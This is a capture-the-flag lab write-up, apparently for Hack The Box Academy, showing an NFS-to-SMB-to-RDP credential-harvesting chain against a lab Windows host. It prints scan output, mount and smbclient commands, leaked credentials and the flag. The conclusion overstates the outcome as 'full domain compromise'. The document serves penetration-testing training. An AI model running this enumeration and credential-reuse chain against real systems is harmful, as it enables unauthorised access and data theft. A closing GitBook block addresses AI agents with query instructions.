> For the complete documentation index, see [llms.txt](https://ghostwirez.gitbook.io/whoami/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ghostwirez.gitbook.io/whoami/writeups/user-compromise-via-open-nfs.md). # User Compromise via Open NFS ## Description A server exists that everyone on the internal network has access to. Our customer agreed to this and added this server to our scope. We need to find out as much information as possible about this server and find ways to use it against the server itself. For the proof and protection of customer data, a user named `HTB` has been created. Accordingly, we need to obtain the credentials of this user as proof. ## Objective * Footprinting ## Flag * Compromised User Account * HTB * `lnch7ehrdn43i7AoqVPK4zWR` ## Solution During the internal network assessment, the target machine at IP address `10.129.202.41` was identified as accessible to all users. The objective of this assessment was to retrieve the credentials of a user account control named `HTB`, which had been created on the system. #### Enumeration An initial full-port Nmap scan was conducted using the following command: ```bash nmap -p- -T5 -sCV 10.129.202.41 ``` ```bash ┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~] └──╼ [★]$ nmap -p- -T5 -sCV 10.129.202.41 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 00:29 CST Warning: 10.129.202.41 giving up on port because retransmission cap hit (2). Nmap scan report for 10.129.202.41 Host is up (0.21s latency). Not shown: 65273 closed tcp ports (reset), 246 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd |_ 100005 1,2,3 2049/udp6 mountd 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 2049/tcp open mountd 1-3 (RPC #100005) 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=WINMEDIUM | Not valid before: 2025-02-27T06:27:22 |_Not valid after: 2025-08-29T06:27:22 | rdp-ntlm-info: | Target_Name: WINMEDIUM | NetBIOS_Domain_Name: WINMEDIUM | NetBIOS_Computer_Name: WINMEDIUM | DNS_Domain_Name: WINMEDIUM | DNS_Computer_Name: WINMEDIUM | Product_Version: 10.0.17763 |_ System_Time: 2025-02-28T06:33:22+00:00 |_ssl-date: 2025-02-28T06:33:31+00:00; +56s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49680/tcp open msrpc Microsoft Windows RPC 49681/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-02-28T06:33:27 |_ start_date: N/A |_clock-skew: mean: 55s, deviation: 0s, median: 55s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 223.16 seconds ``` The scan revealed several open ports, most notably: * **111/tcp** – `rpcbind`, indicating potential NFS services. * **2049/tcp** – `nfs/mountd`, confirming the presence of NFS. * **445/tcp** – SMB, standard Windows file sharing. * **3389/tcp** – Remote Desktop Protocol (RDP). * Various high-numbered ports associated with MSRPC. Additionally, the system was identified as a Windows machine (`Product_Version: 10.0.17763`) with the hostname `WINMEDIUM`. #### NFS Share Discovery Using `showmount`, the exposed NFS share was queried: ```bash showmount -e 10.129.202.41 ``` ```bash ┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~] └──╼ [★]$ showmount -e 10.129.202.41 Export list for 10.129.202.41: /TechSupport (everyone) ``` This revealed a world-accessible export: ```bash /TechSupport (everyone) ``` #### Exploitation: Mounting the NFS Share The `/TechSupport` share was mounted locally: ```bash ┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~] └──╼ [★]$ mkdir NFS ┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~] └──╼ [★]$ sudo mount -t nfs 10.129.202.41:/TechSupport ./NFS -o nolock ┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~] └──╼ [★]$ sudo ls NFS/ ticket4238791283649.txt ticket4238791283700.txt ticket4238791283751.txt ticket4238791283650.txt ticket4238791283701.txt ticket4238791283752.txt ticket4238791283651.txt ticket4238791283702.txt ticket4238791283753.txt ticket4238791283652.txt ticket4238791283703.txt ticket4238791283754.txt ticket4238791283653.txt ticket4238791283704.txt ticket4238791283755.txt ticket4238791283654.txt ticket4238791283705.txt ticket4238791283756.txt ticket4238791283655.txt ticket4238791283706.txt ticket4238791283757.txt ticket4238791283656.txt ticket4238791283707.txt ticket4238791283758.txt ticket4238791283657.txt ticket4238791283708.txt ticket4238791283759.txt ticket4238791283658.txt ticket4238791283709.txt ticket4238791283760.txt ticket4238791283659.txt ticket4238791283710.txt ticket4238791283761.txt ticket4238791283660.txt ticket4238791283711.txt ticket4238791283762.txt ticket4238791283661.txt ticket4238791283712.txt ticket4238791283763.txt ticket4238791283662.txt ticket4238791283713.txt ticket4238791283764.txt ticket4238791283663.txt ticket4238791283714.txt ticket4238791283765.txt ticket4238791283664.txt ticket4238791283715.txt ticket4238791283766.txt ticket4238791283665.txt ticket4238791283716.txt ticket4238791283767.txt ticket4238791283666.txt ticket4238791283717.txt ticket4238791283768.txt ticket4238791283667.txt ticket4238791283718.txt ticket4238791283769.txt ticket4238791283668.txt ticket4238791283719.txt ticket4238791283770.txt ticket4238791283669.txt ticket4238791283720.txt ticket4238791283771.txt ticket4238791283670.txt ticket4238791283721.txt ticket4238791283772.txt ticket4238791283671.txt ticket4238791283722.txt ticket4238791283773.txt ticket4238791283672.txt ticket4238791283723.txt ticket4238791283774.txt ticket4238791283673.txt ticket4238791283724.txt ticket4238791283775.txt ticket4238791283674.txt ticket4238791283725.txt ticket4238791283776.txt ticket4238791283675.txt ticket4238791283726.txt ticket4238791283777.txt ticket4238791283676.txt ticket4238791283727.txt ticket4238791283778.txt ticket4238791283677.txt ticket4238791283728.txt ticket4238791283779.txt ticket4238791283678.txt ticket4238791283729.txt ticket4238791283780.txt ticket4238791283679.txt ticket4238791283730.txt ticket4238791283781.txt ticket4238791283680.txt ticket4238791283731.txt ticket4238791283782.txt ticket4238791283681.txt ticket4238791283732.txt ticket4238791283783.txt ticket4238791283682.txt ticket4238791283733.txt ticket4238791283784.txt ticket4238791283683.txt ticket4238791283734.txt ticket4238791283785.txt ticket4238791283684.txt ticket4238791283735.txt ticket4238791283786.txt ticket4238791283685.txt ticket4238791283736.txt ticket4238791283787.txt ticket4238791283686.txt ticket4238791283737.txt ticket4238791283788.txt ticket4238791283687.txt ticket4238791283738.txt ticket4238791283789.txt ticket4238791283688.txt ticket4238791283739.txt ticket4238791283790.txt ticket4238791283689.txt ticket4238791283740.txt ticket4238791283791.txt ticket4238791283690.txt ticket4238791283741.txt ticket4238791283792.txt ticket4238791283691.txt ticket4238791283742.txt ticket4238791283793.txt ticket4238791283692.txt ticket4238791283743.txt ticket4238791283794.txt ticket4238791283693.txt ticket4238791283744.txt ticket4238791283795.txt ticket4238791283694.txt ticket4238791283745.txt ticket4238791283796.txt ticket4238791283695.txt ticket4238791283746.txt ticket4238791283797.txt ticket4238791283696.txt ticket4238791283747.txt ticket4238791283798.txt ticket4238791283697.txt ticket4238791283748.txt ticket4238791283799.txt ticket4238791283698.txt ticket4238791283749.txt ticket4238791283800.txt ticket4238791283699.txt ticket4238791283750.txt ticket4238791283801.txt ``` Once mounted, the share contained a large number of files, all named in a pattern resembling support tickets (e.g., `ticket4238791283649.txt`, `ticket4238791283754.txt`, etc.). #### Analyzing NFS Share Contents After successfully mounting the NFS share, the contents were examined using `ls -la` and discovered multiple empty `.txt` files. Among these, one file (`ticket4238791283782.txt`) contained valuable conversation logs between an operator and a user named **alex**. ```bash ┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~] └──╼ [★]$ sudo ls -la NFS/ total 72 drwx------ 2 nobody nogroup 65536 Nov 10 2021 . drwx------ 26 htb-ac-262779 htb-ac-262779 4096 Feb 28 00:38 .. -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283774.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283775.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283776.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283777.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283778.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283779.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283780.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283781.txt -rwx------ 1 nobody nogroup 1305 Nov 10 2021 ticket4238791283782.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283783.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283784.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283785.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283786.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283787.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283788.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283789.txt -rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283790.txt ``` Contents of the .txt file: ```bash ┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~] └──╼ [★]$ sudo cat NFS/ticket4238791283782.txt Conversation with InlaneFreight Ltd Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200) --- 01:27 PM | Operator: Hello,. So what brings you here today? 01:27 PM | alex: hello 01:27 PM | Operator: Hey alex! 01:27 PM | Operator: What do you need help with? 01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config? 01:38 PM | Operator: Of course 01:42 PM | alex: here it is: 1smtp { 2 host=smtp.web.dev.inlanefreight.htb 3 #port=25 4 ssl=true 5 user="alex" 6 password="lol123!mD" 7 from="alex.g@web.dev.inlanefreight.htb" 8} 9 10securesocial { 11 12 onLoginGoTo=/ 13 onLogoutGoTo=/login 14 ssl=false 15 16 userpass { 17 withUserNameSupport=false 18 sendWelcomeEmail=true 19 enableGravatarSupport=true 20 signupSkipLogin=true 21 tokenDuration=60 22 tokenDeleteInterval=5 23 minimumPasswordLength=8 24 enableTokenJob=true 25 hasher=bcrypt 26 } 27 28 cookie { 29 # name=id 30 # path=/login 31 # domain="10.129.2.59:9500" 32 httpOnly=true 33 makeTransient=false 34 absoluteTimeoutInMinutes=1440 35 idleTimeoutInMinutes=1440 36 } --- ``` Key Findings from the NFS Share: * **File:** `ticket4238791283782.txt` * **Contents:** A conversation revealing SMTP server credentials:
``` user="alex" password="lol123!mD" ``` * **Additional Notes:** * The conversation also included a web configuration snippet, possibly from an internal SMTP service. * The credentials suggested potential access to other services. #### Credential Reuse & SMB Enumeration Using the discovered credentials (`alex:lol123!mD`), we attempted to enumerate SMB shares on the target (`10.129.202.41`). ```bash ┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~] └──╼ [★]$ smbclient -U "alex" -L //10.129.202.41 Password for [WORKGROUP\alex]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share devshare Disk IPC$ IPC Remote IPC Users Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.129.202.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` After carefully assessing each share, the `devshare` share revealed an `important.txt` file. ```bash ┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~] └──╼ [★]$ smbclient -U "alex" //10.129.202.41/devshare Password for [WORKGROUP\alex]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Nov 10 10:12:22 2021 .. D 0 Wed Nov 10 10:12:22 2021 important.txt A 16 Wed Nov 10 10:12:55 2021 10328063 blocks of size 4096. 6097413 blocks available smb: \> more important.txt getting file \important.txt of size 16 as /tmp/smbmore.34uUUf (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) ``` Contents of `important.txt` file: ``` sa:87N1ns@slls83 ~ ~ ~ ~ ~ ~ ~ (END) ``` The obtained password appeared to be for the **SQL server Administrator (sa)** account. #### Gaining RDP Access & Database Exploitation Using Alex's credentials, a successful login to the Windows machine (via RDP) was accomplished.
The **Microsoft SQL Server Management Studio** was launched as Administrator and connected to the local SQL Server instance. * Navigated to the `dbo.devsacc` table\ ![](/files/a77UWyN6Z9D6C49b9JgI) * And Selected "**Edit Top 200 Rows**"\ ![](/files/2NrM2UwAKoFeio0AKtpc) After careful review of the `dbo.devsacc` table, `HTB` credentials were extracted. * name: `HTB` * password: `lnch7ehrdn43i7AoqVPK4zWR` ## Conclusion This demonstrated a multi-stage attack chain exploiting misconfigured network shares and credential reuse: 1. **NFS Share Enumeration** – Discovered sensitive credentials in exposed log files. 2. **SMB Credential Reuse Attack** – Leveraged found credentials to access restricted shares, uncovering an administrative password. 3. **RDP & Database Compromise** – Used stolen credentials for initial access, then extracted additional credentials from the database. Through systematic enumeration and exploitation, the attack progressed from exposed file shares to full domain compromise. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://ghostwirez.gitbook.io/whoami/writeups/user-compromise-via-open-nfs.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.